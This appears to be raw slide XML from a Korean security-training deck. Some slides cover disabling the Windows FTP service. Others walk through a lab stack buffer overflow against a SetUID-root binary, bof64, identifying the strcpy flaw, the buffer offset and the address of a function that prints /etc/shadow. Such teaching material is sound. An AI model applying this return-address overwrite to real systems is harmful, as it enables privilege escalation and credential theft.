                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{225C8528-3021-446F-A884-8098EB83A2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7393757" y="795446"/>
            <a:ext cx="3017520" cy="937260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA6C2EE-F52B-47C0-988F-9ADB8EE058FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598041" y="2358209"/>
            <a:ext cx="4945126" cy="3745865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1175070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pt-BR" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>“관리 도구” 선택</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6.   “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스” 선택</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8" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C595AB4-0BB7-417E-B170-22E6D6A0869F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="470439" y="703337"/>
            <a:ext cx="5460158" cy="3191027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E0027E-9FB7-4023-A86A-229FA1C85850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360590" y="703337"/>
            <a:ext cx="5287815" cy="5052484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13201121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“Microsoft FTP Service" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>더블 클릭</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시작 유형</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(E):"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 ”사용 안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>함“으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 변경 및 ”중지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(T)" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버튼 클릭</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>9.  “</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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0FD374-6428-474A-9CCE-BE7AC7424EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933458" y="750575"/>
            <a:ext cx="4724019" cy="3886740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{223F26AB-92F5-4B50-9A48-084AF6989E89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6489700" y="952975"/>
            <a:ext cx="4709160" cy="4990625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53021988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(FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>재확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령 프롬프트를 통해 로컬 호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 시도</a:t>
            </a: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                               ※ FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 접속 불가함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ftp&gt; bye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check</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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE29980-322E-4DCB-BCCA-C514AB2AFB9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1569721" y="793145"/>
            <a:ext cx="3017520" cy="563880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289463546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함수가 실행되도록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8D4016FD-501C-4282-900C-883412B2BAA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24D9F0-FF13-4AF3-8FF3-E28D36330FB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88CD331-CD08-4A67-9051-38693C5B197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B6D6D78E-F1DC-4B1A-9DB9-A4115BF300E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740253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dirty="0"/>
              <a:t>파일의 속성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SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소유자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 알 수 있음 ⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>권한으로 실행 가능</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vim bof64.c</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foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(BOF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>취약점을 가진 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 사용됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 내용을 출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함을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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 힌트 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./bof64 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>: 0x0000000000400635 ⇒ BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약점 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>복귀 주소를 조작하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 실행 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{727D84AA-90AB-4EB7-B278-E4DDF745966B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="521955" y="1398059"/>
            <a:ext cx="4034790" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D58818-0FB8-42B4-AB48-3554D67017F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="535313" y="3047806"/>
            <a:ext cx="4989449" cy="2810764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A528125-FF0A-4A9C-A648-6C05C1C3906E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="-1" r="367" b="56894"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318251" y="899528"/>
            <a:ext cx="2997200" cy="880285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{539A5F22-DB43-4D03-88B5-651588C39286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="915758689"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6301370" y="2457302"/>
          <a:ext cx="4932807" cy="3703407"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="236843578"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="287805">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84635548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3304629">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985868"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38913" name="_x564967160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12EBF08F-9CBE-4E11-BC20-9429D8012D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8630" y="3075572"/>
            <a:ext cx="3552825" cy="28829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FC783DDA-DF65-46EC-9240-900D44B5856C}"/>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C0BA43B6-A757-4F14-B55A-F621E8A1D6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14EFBF47-2D0F-4850-87A0-9DF7152DABE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F1F6CCCE-BE66-417C-A423-039F4B05EE2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5704639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objdump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bof64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취약점이 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수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solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>버퍼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>의 시작 주소가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> - 16(0x10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</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54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14AF77C-BB85-48EE-A741-3945FDC05F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497975" y="936036"/>
            <a:ext cx="5014341" cy="2785745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E368D99-6D3F-4489-A11B-6A622DFC0473}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="155" b="35736"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497975" y="4108245"/>
            <a:ext cx="4947604" cy="2063955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07E60104-4003-4ECA-892D-8CA49033ECAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
